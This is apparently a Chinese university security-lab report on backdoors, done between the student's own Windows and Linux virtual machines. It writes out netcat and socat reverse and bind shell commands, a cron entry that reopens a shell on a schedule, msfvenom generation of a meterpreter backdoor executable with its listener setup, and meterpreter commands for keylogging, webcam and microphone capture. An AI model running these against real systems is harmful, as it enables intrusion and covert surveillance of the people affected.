Exp2 後門原理與實踐 20164314

1.實踐內容

(1)使用nc實現win,Linux間的後門鏈接。 熱身linux

(2)使用netcat獲取主機操做Shell,cron啓動。web

(3)使用socat獲取主機操做Shell, 任務計劃啓動。shell

(4)使用MSF meterpreter生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shellvim

(5)使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權windows

2.基礎問題回答

  (1)例舉你能想到的一個後門進入到你係統中的可能方式?安全

       在下載軟件時,後門捆綁在下載的軟件上,與軟件一塊兒安裝進入了系統。tcp

  (2)例舉你知道的後門如何啓動起來(win及linux)的方式?編輯器

       windows:實驗中作過的方式有直接雙擊開啓後門程序、經過Windows->控制面板->管理工具啓動任務計劃程序、開機自啓動的後門、和其餘程序捆綁運行的後門程序等。
       linux:經過在cron中添加任務,定時執行、經過一些腳本啓動後門程序、經過和其餘程序捆綁運行後門程序。
工具

  (3)Meterpreter有哪些給你映像深入的功能?網站

      獲取攝像頭權限進行拍照;其實它的全部功能都使人印象深入和懼怕。

  (4)如何發現本身有系統有沒有被安裝後門?

      殺毒軟件吧;監控是否有進程異常,數據流異常以及開機自啓動項。

3.實驗過程

準備工做:因爲不想用本身電腦的Windows,我就安裝了一個Windows系統的虛擬機;在Windows虛擬機上安裝netcat和socat。

1.獲取Windows和Linux的IP

(1)在Windows下,先使用ipconfig指令查看本機;在Linux下,使用ifconfig指令查看地址。

 

Windows的IP:192.168.219.131    ;Linux:192.168.219.128

 2.使用ncat,使Windows得到Linux操做shell

(1)win中使用ncat監聽4314端口:ncat.exe -l -p 4314 

 

(2)在Linux終端窗口使用 nc 192.168.219.131 4314 -e /bin/sh 命令去鏈接Win的4314端口

 

 結果:Windows成功得到Linux操做shell,可以進行操做。

 

3.Linux得到Windows shell

(1)在Linux中監聽4314端口:nc -l -p 4314

(2)在Windows輸入指令 ncat.exe  -e cmd.exe 192.168.219.128 4314 反彈鏈接Linux的4314端口(指令中的ip地址需爲Linux ip)

 

        結果:虛擬機(Linux)成功得到本機(Windows)操做shell,可以執行Windows中的命令。

4.使用nc傳輸數據

    netcat根據課上所學簡單來說,就是利用TCP、UDP鏈接進行基本的數據收發,在兩臺主機之間傳輸字符文件之類的,因此咱們在這裏嘗試用它在win和linux之間作一個後門。

    雙向傳輸字符串:

       

5.以定時任務cron的形式啓動netcat獲取主機操做Shell

(1)先在Windows系統下,監聽4318端口:
(2)在Linux終端輸入   crontab -e,選擇3,也就是基本的vim編輯器;

(3)vim編輯器中用   i   改成插入模式,在最後一行插入17 13 24 3 * /bin/netcat 192.168.219.131 4314 -e /bin/sh  ,意思是在3月24號的13點17分反向鏈接Windows本機的4314端口,就會啓動cron

(4)當時間到了13點17分時,此時已經得到了shell,能夠輸入指令。

6.使用socat獲取主機操做Shell, 任務計劃啓動

(1)在Windows系統下,打開控制面板->管理工具->任務計劃程序,建立任務,填寫任務名稱後,新建一個觸發器:

(2)在操做->程序或腳本中選擇你的socat.exe文件的路徑,在添加參數一欄填寫tcp-listen:4314 exec:cmd.exe,pty,stderr,這個命令的做用是把cmd.exe綁定到端口4314

,同時把cmd.exe的stderr重定向到stdout上;(此處應有圖,但我找不到了·······)
(3)建立完成以後,再次打開時,能夠發現以前建立的任務已經開始運行了;

(4)此時,在Linux下輸入指令 socat - tcp:192.168.219.131 4314  ,這裏的第一個參數-表明標準的輸入輸出,第二個流鏈接到Windows主機的4314端口,此時能夠發現已經成功得到了一個cmd shell

 

7.使用MSF meterpreter生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell

(1)輸入指令  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.219.128 LPORT=4314 -f exe > 20164314——backdoor.exe     生成後門程序:

 

(2)經過nc指令將生成的後門程序傳送到Windows主機上:(在作這一步以前先將本機的殺毒軟件和防火牆關閉!)

 

(3)在Linux上使用 msfconsole   指令進入msf控制檯,使用監聽模塊,設置payload,設置反彈回連的IP和端口:

MSF打開監聽進程
msfconsole:進入msf

use exploit/multi/handler:進入handler模式
set payload windows/meterpreter/reverse_tcp:設置payload
set LHOST 192.168.174.129:設置LHOST
set LPORT 4318:設置LPORT
exploit:MSF開始監聽

 

(4)設置完成後,執行監聽;

(5)打開Windows上的後門程序;

(6)此時Linux上已經得到了Windows的鏈接,而且獲得了遠程控制的shell:(此處忘記截圖了····)

8.使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權

(1)使用  record_mic  指令能夠截獲一段音頻;
(2)使用  screenshot  指令能夠進行截屏;

(3)使用  webcam_snap  指令可使用攝像頭進行錄像;

 

(4)使用  keyscan_start  指令能夠記錄下擊鍵的過程;

(5)使用  keyscan_dump  指令能夠讀取擊鍵的記錄

 

 

 4.實驗感想

       此次實驗讓我收穫良多,首先我知道了後門的原理而且進行了簡單的實踐,掌握了使用nc實現Windows和Linux之間的後門鏈接,其次我學會了meterpreter的使用,還掌握了MSF POST模塊的簡單使用。此次實驗讓我意識到了保護本身電腦主機的重要性,防火牆和殺毒軟件並不是至關可靠,從此不能輕易點開陌生人發的連接,不瀏覽不安全的網站,努力培養信息安全意識,提高自身信息安全方面的素養。

相關文章
相關標籤/搜索